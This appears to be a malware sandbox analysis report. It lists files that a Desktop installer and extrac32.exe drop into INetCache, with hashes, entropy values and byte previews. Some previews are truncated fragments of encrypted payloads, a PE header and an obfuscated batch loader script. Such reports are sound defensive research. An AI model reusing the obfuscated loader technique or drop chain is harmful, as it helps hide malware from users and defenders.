Preview:	.R,j.^..P...Q8..N..t...u..u.y........j.j.j.S.V...U.Rht.J.P........y........j.j.j.W.0.E..~.WP...Q..M...Q...R...x..M.........@..3.QQQP.0$M......_..^[....U..Vj.......j....mL..@......p........j...,nL..p..F....j....mL..p..F.....M.....p....mL..H..f...F...N..F..^]...V..W3.9~.t.j..v..P...YY.~.9~.t.j..v..<...YY.~.9~.t.j..v..(...YY.~.9>t.j..6.....YY.>.~._^.V......j@V.....YY..^...V..N....mL...t...Q.P..f..j.V....YY..^...U..SV.u.3.W.F.....t..X..M...t..~....3.F..U.Rh..J..@.P......xg.E..~.WSS..SP.Q..E.P...Q.....Q.P....F....p0Q.R...x4..j.P...Q(...F....P..Q.R...j.P...Q$.F.....t..@..3.....@.._^[]...U..V..~..t+j@.....Y.u....u..u.V......t..}..u.Q.......3.^]...U.....M...E...t\..tXSVWj...d.I..5..I...jXS..jZS....Sj..E...`.I..]..5..I.W.3h.......u.}..s.h........G._^[..h.@........U..QQSV..3.]..]..V............F.P...p.j..v(Sj.R.Q,8^=u.8^<t1.F..U.Rht.J.P.....M...t.8^=t...Q.P..M.8^<t...Q.P.S.v...T.I..F..U.Rh..J.P.....M...t...Sj.j.Q.P..E.P...Q..]..F..v8P...QP.F.SP...Q..F.Sh..I.P...Q..v...H.I...t..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Checklist

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.611528787153796
Encrypted:	false
SSDEEP:	1536:Nq0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyR+:E0Imbi80PtCZEMnVIPPBxT/sZydTm6
MD5:	185785B5D8E756C650A6A0F063FC238E
SHA1:	2FD585FFB1C6E995EF395C365D1C2C33F1B0E0E8
SHA-256:	8996F9CB0CB2A21F6BE2688FE42A21EAA602B8CA2EEB0976D253008136940EED
SHA-512:	081F4E71F2CF6CFB4EE6D6D0F6FC5E6CACDAFFE7E9A5C7A4E482ED96B2A55F0CFF93728D49185F0601878979DAE0B689DAE7A80C515AC6526A6D6DEFA7B63512
Malicious:	false
Preview:	......@..t............ ..t..._..]..U..U.3...=...t]...t.j.Y...t.......t.......t...... t....V.......#.;.^u...............t...............t.........]..U..U.3.......t[...t.A...t.......t.......t.......t... V.......#.;.^u...............t...............t.........]..U..U.3.......tj...t......W........t......t..........t..........t.......V.......#.;.^u....`......t.... ..........t....@.._..]..U..U.3....tNV.......#.;.u.A.......#.;.u...........#.;.u...........#.;.^u.........#.;.u... ..]..U..U.3....tNV.......#.;.u.A.......#.;.u...........#.;.u...........#.;.^u.........#.;.u... ..]..U..QQ3.!E.f.E..}..=4.M..\|...]...E.VP.....u....(...Y..Y%....^..]..U..QQ3.3.f.E..M..}..=4.M..\|...]...U.....=t2...t.........t.........t.........t........ t.......U...=t6...t.........t..........t..........t......... t.........%......]..U... SVW3..}..}.}.}.}..}.}..u.....S.2....u.....#u..#...Y..Y.u..e..=4.M..\|'.}...].S.t....u.....#u..e...Y..Y.u...U._^[..]..U... SVW3..}..}.}.}.}..}.}..u.....S......u...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Comparing

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996354297063226
Encrypted:	true
SSDEEP:	768:oJREV2Mm3e1P+Fe209aZsIZgMT7r3I/Sbp894n2gbHS3rckDryKCX8ixcr+xXsnF:J2Mm3o+82NfZH73bHG37Csixcr++F
MD5:	C12B751A428451BCB8D82DE28058909E
SHA1:	F727A76F120DA5C4BF51057335B39FEF2AD1F3BF
SHA-256:	F5FEDC27BF0BC80A62A6D52E08B1CF9B97B718329E37383B54FE6B9882BDBFED
SHA-512:	C67932DE59C48CFA3EE82C973D4F9DA58ABABB3CDC15CF3EFB7C26129F72720D7978D92350D8B73C0A3DA28F4B9FD53BE61C34F9A4F03ACF0899CAAF7B4B5E3E
Malicious:	false
Preview:	+........8H.fcN@.J$...?...r...I...........I0...-........G.2.#..?.nZGj._qv.Z2.\|.nM.....'.......u...Ee.R..8......M.].<N.Fn.\+p....7I....yK.i(.......t.<:f..:"+.1....Z.....E.E8.6.2..... ...F..._..D.....B..!..\|G.~_'..w..j..H._./{...O.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....C.J.'.F...h..............Y..@^...Y..@^..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.$..,P..Myn.2..t.W.............../.Y..m9...Y..@^..m.....S.....5...x..2).U.j....R>..#.~.<.z..)...x....k.sI../.,...5......M..Ga&~9"..V..._...V`(......fd..g.....wz ....M.{.._..y..a.....@:s...=.....iV...h<...^O.z.U.PH?..K.%..OR.......Z=N...=..y.....*.'..#...frs..0...`@.e.g....u(.X.GH=+>...h..0.._h.....d..~1;....T.m0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cord

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	6.113521907310826
Encrypted:	false
SSDEEP:	1536:tb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8E:H/Dde6u640ewy4Za9coRC2jfTq8E
MD5:	3D55019812EE286EF11E770CB3339430
SHA1:	61A75BBE654D5D556207152CFCAE601068ABDE62
SHA-256:	679858F3E6D4555E06C76A508F722949301451E7D55C2B2D0A103F7EB34A0532
SHA-512:	50165CAC2F2C803EA4CE11E0AF551C0425F2F5107650E244D523CC22ADC430AE0AE87B6BED28826A3BC74B3A0889A558E35703AE9B02F6A6D3D310E223B06651
Malicious:	false
Preview:	..\|..T)M........t .......u.j..0..\.I......u.O...}.GV.s..).T)M........t#.......u.j..0..\.I......u.F;5d)M.~.N..;.. .T)M.j.j.h..........0..H.I.C;.~..}...T)M.^u..M.j.j.h..........0..H.I..)...j....0..\.I......P.T)M.j.......0..@.I._[]...U..E(...u.j.X...}.....M SV.....W...u...U$...u...}0.\|h.}.3.f9.t^SQ.u.RQ.u..u.PSh..L.S.u..a>...u.....t8WS..H.I.hg...P...u-W....I...t".u0Phg....6...u..6..<.I.2._^[].,..=.(M..u......f..........U..Q.}..SVW.......u(......},F.U ....#u(G....#},...u...M$...u...].f.E.f.......M.f......f.E.f......f..............u-j..[.....L)M.Y..@)M.......1...Z....M.........SS.u... ...;.......t9.=.(M..u......f...........PV.5@.I.j..3.......Wj..3.....2._^[Y].(.U..E(@..S..#E(VW.....P..P......t.....M,...u......j.Q.u..}..u$.u .u..u.P.u.h,.L.QW.<...u.....u.2..-..t.j..u.h.....7..H.I..=.(M..u......f........_^[].(.U..E(...u.j.X..u....V.....P.bO..j.Q.u..u$.u .u..u.P.E,.u.@..h,.L...#E,P.u...<...u.....u.2.."j.....I..FL.=.(M..u......f........^].(.U..E(SVW...;.u..B. ......P..N...U,.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Counts

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	ASCII text, with very long lines (977), with CRLF line terminators
Category:	dropped
Size (bytes):	19688
Entropy (8bit):	5.131731050514049
Encrypted:	false
SSDEEP:	384:tZAYAYiQIXreGmFfVJCtkOOGRJj/WNse+IqgiAdPC+BjvHim7v7SegoZ/LUmM:TAYARTrhmFfnCtkkWYRgiOPC+BjfimzU
MD5:	5DBB88A025529031178DCBFF6CD25946
SHA1:	DFE8B568C6A72CC975E02931BF9D3E83DCC9AC9A
SHA-256:	93422F40EA0D9E670E2ABCE6BD1863477BC4F93D24B6115081CDE9F702413009
SHA-512:	D076DF1D4CF133CD6AEDDA29FDDE670D2676938F78522EAD60DA3B35D2F37CA9DFD8C9D70EACE70A596AC3BFE64CEA488709B71BE803682ED98B34663BD6C025
Malicious:	false
Preview:	Set Pic=v..UcnSte-Safer-Rings-Pj-..XESlRenaissance-Bumper-Opera-Vt-Subscribe-Probe-Slot-Arkansas-Experiment-..pdLanes-Ranges-Novels-Agree-Stats-..nkCTill-Coming-Worthy-Pal-Accredited-Wn-Pork-Arrange-..AGPalmer-..icOur-Std-Bean-Flat-Command-Louisiana-..Set Challenging=M..jHkDue-Resistant-Reached-Brass-Lance-Mario-Cleaners-Barn-Pressed-..BFVDMart-Julie-Attending-Lord-Webmaster-..HoNextel-Beads-Coaches-Debt-Awards-Companies-..xBcEducated-Choice-Smithsonian-..pJCloud-Node-Cutting-Blades-..EYSuck-Clinic-Butts-..PHAssignments-Letting-Hepatitis-G-Typically-Achievement-..vurDesk-Dem-Google-Phentermine-Tanzania-..fJnImmigrants-Lasting-Aud-Nearest-Dod-Scratch-..Set Execution=p..kTCarter-Exist-Eau-Measurements-Encourage-..NrReduce-Genes-Cause-Allocated-Um-Thickness-Task-Couple-..HZLosing-Issn-..ipTShepherd-Priest-Comparable-Dust-Adjustment-..tHycAnnounces-Friend-Strictly-..hKDame-Impose-Structured-..feTerror-Explanation-Nuclear-Stewart-Specifically-Guild-..ilCasa-Mayor-Blackberry-..Set Glow=6..Md

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Counts.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (977), with CRLF line terminators
Category:	dropped
Size (bytes):	19688
Entropy (8bit):	5.131731050514049
Encrypted:	false
SSDEEP:	384:tZAYAYiQIXreGmFfVJCtkOOGRJj/WNse+IqgiAdPC+BjvHim7v7SegoZ/LUmM:TAYARTrhmFfnCtkkWYRgiOPC+BjfimzU
MD5:	5DBB88A025529031178DCBFF6CD25946
SHA1:	DFE8B568C6A72CC975E02931BF9D3E83DCC9AC9A
SHA-256:	93422F40EA0D9E670E2ABCE6BD1863477BC4F93D24B6115081CDE9F702413009
SHA-512:	D076DF1D4CF133CD6AEDDA29FDDE670D2676938F78522EAD60DA3B35D2F37CA9DFD8C9D70EACE70A596AC3BFE64CEA488709B71BE803682ED98B34663BD6C025
Malicious:	false
Preview:	Set Pic=v..UcnSte-Safer-Rings-Pj-..XESlRenaissance-Bumper-Opera-Vt-Subscribe-Probe-Slot-Arkansas-Experiment-..pdLanes-Ranges-Novels-Agree-Stats-..nkCTill-Coming-Worthy-Pal-Accredited-Wn-Pork-Arrange-..AGPalmer-..icOur-Std-Bean-Flat-Command-Louisiana-..Set Challenging=M..jHkDue-Resistant-Reached-Brass-Lance-Mario-Cleaners-Barn-Pressed-..BFVDMart-Julie-Attending-Lord-Webmaster-..HoNextel-Beads-Coaches-Debt-Awards-Companies-..xBcEducated-Choice-Smithsonian-..pJCloud-Node-Cutting-Blades-..EYSuck-Clinic-Butts-..PHAssignments-Letting-Hepatitis-G-Typically-Achievement-..vurDesk-Dem-Google-Phentermine-Tanzania-..fJnImmigrants-Lasting-Aud-Nearest-Dod-Scratch-..Set Execution=p..kTCarter-Exist-Eau-Measurements-Encourage-..NrReduce-Genes-Cause-Allocated-Um-Thickness-Task-Couple-..HZLosing-Issn-..ipTShepherd-Priest-Comparable-Dust-Adjustment-..tHycAnnounces-Friend-Strictly-..hKDame-Impose-Structured-..feTerror-Explanation-Nuclear-Stewart-Specifically-Guild-..ilCasa-Mayor-Blackberry-..Set Glow=6..Md

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Death

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.998364214562404
Encrypted:	true
SSDEEP:	1536:WI1QpP+QGJiy4d0KubilDV4keak6Pi8eQPqE8W+9NobEPX0PATtMlQA:l1QpP+NkLubjkeaI839uE89TtM/
MD5:	DAE783F636F73B24C92877F5E0E6B481
SHA1:	7856A8C1B16CA192D3F29C11B3BF1416E537694F
SHA-256:	1E8BD671652BF32086F8EAF3A757FCC465E98C5232BA4FA6D5B249F2079CAB9F
SHA-512:	0C0AA7AC84C00B960E9A21919204382620B87F23020162EC208B53B3BA33ABBAFA9A75070FFCC7168BC4461CC6D0F99FEF69C3BB9427327677B80AF28B87BB70
Malicious:	false
Preview:	j.R.R.F..j.B.......>/z..9..m....z...J.-...I .6YrkP..Y...x.1''Z?.m...P\...].b...Pb.....M.C. 7.....>..]Ef.4...L<-\.O...@Q..lj.)..5....fU.N.7v#..!^V=...K]`.K.r...-j.T`...ORi.-...Z..6.3....mM.....r....S..._8?.t..HLQ<._.q.............c0........3D...K5U.......>........W...W...q.}..&K.N,.......a...[....8....Y.....{..~......A....x..6.F...9v._.iX...p..,....b.._b..4q.d.6.......P.A."P.t....~.7.;u.../..y.4.A.....{..1.....fY..p...i....N;......X.}..#...@.N&...?.z....o.........G..~..n....s..S.Jw.L.L..].z.Y.Er./i..Ft..i/..b......1$O..V.H_.K).<..#n.@.....n`N.......1p..H7.v/..-..oU^F..Z..f.{.........\43...M.._.U......o2...S....jOE....{".E}/..f.]$$v............$.{H..6=k.D.>8..#...]....V...l....2W6...\|j.}.N...H..k...._;[+ee..GJ.....uoD..0&3+.y.-?'kn..Q`....:..J........ E...Oc.~.94M........B.$t.".Ka..i..'sG.J7...3......v.i..+....v.yl..p)Sg..yF3.}~.=+..X.^/9...V...&.d...=.......u...[.=%..y...B;."...q;.N...........h...a..k.s.......n.H...\|%..07$5.L..z.\|.I.5.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Draft

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	6.69880901061575
Encrypted:	false
SSDEEP:	1536:+UQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03E0:+xlHS3NxrHSBRtNPnj00
MD5:	FA5174DE2144E2A13EEC2556E0AF26CE
SHA1:	052B953175E6EA96E6D5EA7C5141EA86AEF0BD9F
SHA-256:	BADB2CBCD20601675D77ABA7A5CF0D9B1160E1D685147244E2A4CCA98D2BA53C
SHA-512:	5F5845A02D46B5330A0D7D8970B127F4A5D4C0D504FDA0005356BD69F2163C302FE8F54071342C4226D369A2BF15DD1C82895CFCA5C05072DB4443D8555181C0
Malicious:	false
Preview:	9.t..F............F.U........w....G........M..........]....<.......P....t$X.L$,jn.........$.....\|$..i....T$ .D$..Q....L$,.T........J....\$$....)....\|$9.t..D$..p.......t$.......L$ j.Q.q.........D$ .D$P......p.j.P........D$ .D$P2........F........@.Ph...........$.....[...T$4.T$..g...F..D......@.Ph..........T$4.T$..C..$........5..F.Pjn...E....E..@......@.Pjy.L$0........$.....L....T$ ...t$X.L$,jn.x....T$P.\|$4.T$ .\|$..D$..........E....E..@......@.P..........E....E..@.....L$(..@..PR.!....$...F.....L$(..@.Pjn.......$.........$........]....t$Xjm.2.t$Xjk...t$Xjm.L$0......T$4.T$..1....t$Xjl...t$Xjn.L$0.....T$4.T$................P.T$hj..7........s.........i...Q....^.........T...Q.~....I......p........j..7.......+.........!...Q....................j..................Q.C........I..TE.G.A.G.A..SE.G.A..TE.+TE.>TE.hTE.hTE.STE..UE...A...A..TE...A..UE.*UE.HUE.rUE.rUE.]UE.[\E...A...A.0\E...A.E\E.p\E..\E..\E..\E..\E.\]E.b.A.b.A."]E.b.A.B]E.u]E..]E..]E..]E..]E.d^E...A...A.9^E...A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\French

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	Microsoft Cabinet archive data, 488771 bytes, 12 files, at 0x2c +A "Draft" +A "Within", ID 7043, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488771
Entropy (8bit):	7.998419305048336
Encrypted:	true
SSDEEP:	12288:mVyb0erwsk+zdV/80Vt4M0eVHrhyVrTyk4AuGEpt3KBnRLDYupX0Xo3249UI:mkHtV00j70eVLhyV3yZf3KXLXBb9V
MD5:	0AE8CB3479A9582A00DFC70D04B5602D
SHA1:	8F6BC69D60F140685F3789AEC791DE509D101980
SHA-256:	8CE1EF3A25D06D57F27919C6B31563933A38FE471E8A5D7D755A3082F7359414
SHA-512:	F3ABB2D88173DF46A2D6CB1C3B915BE61A0F1B3BF4B86687673E506D68CF4FEA500E45E8EB712659ADF93FC5AA81FE856C9FA5978BB1C329516D9F38983DF5F5
Malicious:	false
Preview:	MSCF....Cu......,...................=..................Ylc .Draft............Ylc .Within............Ylc .Acids..d.........Ylc .Checklist...... .....Ylc .Limited............Ylc .Stationery............Ylc .Nv............Ylc .Guardian............Ylc .Norway............Ylc .Tender....._......Ylc .Cord....._......Ylc .N...s..R..CK..{\|.E.7>.$.dB...A...$......$\28\...PWg......B..3@[..>.....D.E...^.`...$.b....vV..I...{.'.\..}~.....tu.S..:...N..geyv..[.#.Zm.-O-\|.zD..(l/CB...Y..)Qy...J.d2~.W...../.......U...h.NGB;R.....!u.. ..OMa.R...].......GX3;...%...Fu4.m...l..V.U....5.(HM..s....7._-....RSpyT.....V.._?,...w..,..,..I..... hT.@2.}...,.N........w.o%.O?3..`rQs?.J....N........l..\V.E....:......5..UR...>8..=.q...m.`..4..X..[T.O...............=s...rj..P...Q%.3>.uD.a.:..iJ...Z..p...hw...-V...9y.{8..;a....G9.+=a....B@~.z.....\.G&...=...._%F.....!5G..j..K.2.....9.2."+-......\.....p^.....j..L....1bW.]....d...AmB24.....o..6OO....5....5..B.a.....\|=...1...*.^%../q.z.g.+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fusion

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	data
Category:	dropped
Size (bytes):	27264
Entropy (8bit):	7.993745996878691
Encrypted:	true
SSDEEP:	768:sflmZXurId6fLiFQqCCzC7o2rXztYuTM14vlVl/:imZerVfLzFtYuTM2NVV
MD5:	7818E5C1E0A7B7061675EECB16921BF7
SHA1:	C17130E44554C4CF8109CBB65D7A6E11E0182664
SHA-256:	9B5066A39AEFD73BCD4CEF4B91F6B3749934B95EADE4BB40D29DD810DB8E0728
SHA-512:	98A49AAC2CF43C594F77CC5A91ECF943771B4AE85BD765E13C5CD6BC0C20AD5615A3183674B946BA68086B0075A3AEB2B137F2F91EC30AC6D1F40B6FD24457E7
Malicious:	false
Preview:	c..J.c..2..........n.w.{..@b..;......[....W...>..CrA..(........@l7p<..........Al.Z...4bA[$.....%..............I...F\..PYF;. ..J...4.......$....W'`..\Rrd....(.).h..n.mg^..{...4....S....x.,nQ.........5T.8c].......Dm...u.e........IT.....P...c..H...7&f.,..w..}..._o....D@...T.3....nn..\|... ..<OG...-Zd.+Qz..7..4".<.......O..Evr...a"..P.f..}l4$....x..~....6...$W.i.z...jL<.m..#..rG...K..y.=.....=......%S../7.k..q.R=$F.8.M.........}y...C.UD..af...+...i....X...L.......qh..C.4.c.l.t.1Va=H....qP.i...2.S...j.......%.1.......J..q..;T.Q.b.-...z ...".Nc.x..\|....R.a..0.....+..Uh..&k..1&..Im.^...i.:!..gm. .1 .>-o.>7.....1...k(.D?c......J.T..ob.}..%_.$.7...i......ML..7..%..R....2%.jl...f...-.F*:....S>..E.(......&.?.V>.W. ..Q....Qp.'.Y..P..a....;!\|..`6.7...c...p..}..l...>.S ^...e8>..a.=/\...6....h...P...p.A..S.hK.....S.....`.\..$.@.-sMf..[>.z.Y.].k.4....v.a4w0:.......t..fY.....oNvyt@....(.:.....n...q....).M.......n..D..).-.\|Hl..oX....g26..H....&"...uk.b

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Guardian

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	6.0790540689237975
Encrypted:	false
SSDEEP:	1536:5pYhWoXElJUzdlDfFgQa8BpDzdZPp7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGY:XGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf8
MD5:	9D1AAB9F488D0E59B5357A7AD0E54722
SHA1:	A52CC329FBF15899D25AEAE84BEBA833F5C11F3C
SHA-256:	B410DCE54934B7A115F6CC2CCE2BF82309B81C756CD390F92B0A062E53BD3340
SHA-512:	B55AA758034949565C2A587778605D67B893094482A2BCD553E90D4F51CE8BA7F8A2D2F04F15A4DE69149F1080DA9510F62FA00ED1845955A55A7E115969C7C6
Malicious:	false
Preview:	.A....G..>......3....M....}.A....E..P........J........B.c....z..........G.;........E..M...E.....t1+.M........E......U..U.f;........M.....m..u.E.;G................M..@..A....M..@..A.....5M..A.....5M..A.....G....6....=....F..v.%.....E.....'....u.....n...........L...}..d$..O...]...f.x.N..J......f.x.5...N...F.......N........N........N...U..B......A....f..A......j..E.CP.E.].]..PR.......xq.}....f....E..H..E...f.x....~U............A..N....E.;.t8.F...........~..............X....E..F.....P..............u..........E.........._^[..]....}...3M.....7...d.,....E.....p5M.;........K.....5M........5M......E.t5M..E.t5M........w..K..u......K......n.....;..........t..?+..I....8..0f;.............u.3..u...........,....E...}...M..C..A...3M..M..@..A....3M...5M..A....3M...5M..A...V....5.3M.....H....F..v.%..........E.f9E.s..G..B....G..>...........M....}.A....E..P.............@.K.....F......#......E......E.....3..E......E.D...u..}...@..E...f.x.N.......D..C.M.j..]...@..E.E.P.E.P.E.P.........N..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Happen

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	7.998058707297649
Encrypted:	true
SSDEEP:	1536:wLOgDYvLudFzRuuw3o4N/9U+cjmCx5/RG9fWFtPqbMtSZRaiF2k7yOQcxeY:wLncudFzC3oPq5rTZ7ZoQeY
MD5:	DE0521C44DE5F0C9CAE40F1AD4024C82
SHA1:	D45FBDE3D3A970B95C95FD14D288436DCA945C93
SHA-256:	1D0852F21E30AF667CFC646FD1D1810C11CBAD1588D36626C3B8CD2D800D8DAD
SHA-512:	849D8AA4437F8B9CF9D39095C4008FDBB52558CD6A2962858FD22ACF98C113317CC79D23B4F241CD54EF68A4A353D5974A688246FE1C0D5D5B6524C52E9C931A
Malicious:	false
Preview:	1.............I.5R.....F.9.$.,...j....(.H..8s.Z._=........x......@...h.zW....{2.....P.P.42E/.....xu#.....UR6.<16U..?.v.z..x....&..^T.._.E.;..H.<:.J5..,.`]....py.\.X0.....0..E.....2.Z.`Y.I....e...I?./....^m.._O...>h...9...e9.......P`.x....QwXE)Q.-q.%....[/.7...q(....z#9)...n.~...kb..:.w8.ziI..Y#C.c......]..5C..<..#Rt..bu.....g..,..@]...Fv..I./o.}.V6...P.....{..5)cC.#....r?......2.0...J+.]r.j.I. ..A..2.x_J....).Bqx,.Z.X.W...j....VN..ft.-9..%.......4T...e..F..o].N..p,$.Y..:.+[...X@....l]}......h..v.....:a..(-.>....H.....Jv..&.-..F.46. R..eQ......s>W@... E[L..Mu%...9...@..=.13....#...t><......'..I.$....../.!.*{.7.E\|.J......N.5!P..J.......2.{6..M....zFc1...`..:...8...x...SWt.i....H-....wJ....DU.......(S.%...<<."r...?...........V.G.......3B![...b.u?q....w.....l%..:]........C........_vau......I...o3hx...?....H.b.c.W$-...YP..z.NA....R...........<..q..83O...CM.zy^.;....... ...v.Y.....vM..$....:u.[.7@A..H....X...n...O...N.1:T..[Y....m..7.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hobby

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	data
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	7.9967528332386815
Encrypted:	true
SSDEEP:	1536:7kkMkjZtW5Vna/GXAoHk3XJCKdtjLMKPga6+9rWGyjchFtpSpm8GjERq:PvWfna/GwoEpL9LzPx9rWGbHGSEg
MD5:	F697BD6454555E053A0E8AE9FAD346EA
SHA1:	7FC5CB8CA81CF6D7678C31FC3D56BD5635263CEB
SHA-256:	A167D1E411F0696B2767595D3032B01E50AB25B2B36E9B48D095C55A75966A75
SHA-512:	03117D032ADBFD33695F77FED1B35337B3B7F3BDCEE8466CC0234BAB678763F208FEE010EB0A6FFCBB6EF517AEEA34CAB9211571AB6ECE813F7C3274FDBCC406
Malicious:	false
Preview:	.EV..w.z'5..,.GO!V.1..z .\..m..7..%.9.ZC.'.$.y.4.Wo.\....(....;;.,wW.Q.8y.5l.G..k08.U.D..]..5g.M..v..[X....&..(g..&.m..'.O......c....q_NC...M..oXG...s.j......I..........(".Ux2Swz..^.....)..KV........t4..K.7......pg9.......W...\|.:#.S..".n....mh'i"..V..^..e...{.....L~x...KO:...,7...;Hb.......N.....O964...T.{.).qq...1......N.+..6tv.N.g.@....~.V"...B.T0........i3.P.?...;.:.s.<_`.....6.$.f).4).".........D .W.'>.....e+w..L./..J..a...."?Q.^."L...c...H....k.y.@#..giK{.....T..h ..X.w@.....M..........5......@..+...6..].3W...0-.`.A..O..BdG..y.C[...hv..v...V+.J..v..T.j.0....>......l.YIC....G.k^...-..N?q.7.{..bi.A....A.\|....Br.e_!q....I.v.\..i..\|.>.........H.......8.#.B..Z....)...Mi...N6(.G\|....'0.z.T]B...o..Bw.....Af3.4.=...w.h......ot..p).9Ge..o.<..t.................XW.v....0...I...4."..cm$.Y.g....>...u..b..Z.......%..G......$.2...k^.T..9..5.>d..m.R.B.......N1L..8..V..[CV.%..K....<...V.$....sDV;.....(ll.H...s.~./`B.k5...0V.?.@.....vB...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Limited

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	6.526384411189995
Encrypted:	false
SSDEEP:	768:QQ18OWrM81EyJqx9EdzGGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSR:j1/AD1EsdzVXnP94SGGLpRB6M28eFvM7
MD5:	C0FFC97294EEC575D833E1FBCE9C6304
SHA1:	2D7894E40ADDC7777C1342B9616BCC801DA4C544
SHA-256:	831F9A28C65B904FF254F54A25A3F79A1DDBC75DC0811A92F1B483888F357B91
SHA-512:	6F64587EA856596C8886BA57A83A2155FA3021980D4BED9F2ADCB0D8D2EE51DD711AB456CFEC4E52E30B49313DC210073C79F8D37D46D75E8B76E21E35E51094
Malicious:	false
Preview:	..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\N

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	5.009324222275541
Encrypted:	false
SSDEEP:	768:bGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:yKaj6iTcPAsAhxjgarB
MD5:	6B99C8A6199A05DB81C62D3668E44EC7
SHA1:	F96BF0675EF49BF19B68F85A488457D5D4931350
SHA-256:	2EDE9D469DDA9E2526C261AAF5C7CEA331054AD8FA19CDC931B67248C77AC007
SHA-512:	4A1B34270F1D0E9A552F3D6EC62DF468291D14A261FC0FB84777770BCFA185BBCDEC9ACA366B4C906153C0A055AD5EE6E01EBA80E1BFDFF03EF94A2AAB146017
Malicious:	false
Preview:	r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.......................................................................................................................................................................................................................r.r.r.r.r...........................r.r.r...................r.r.r.r.r.r.r.....................r.r.................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.....................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Norway

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	52224
Entropy (8bit):	6.557441990395731
Encrypted:	false
SSDEEP:	1536:k/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTu1:khfhnueoMmOqDoioO5bLezW9FfTu1
MD5:	395C9CF43E40A325C2203570AE70783B
SHA1:	EDFE5F52DD11F4FD106C75B1C730B0546FC6970E
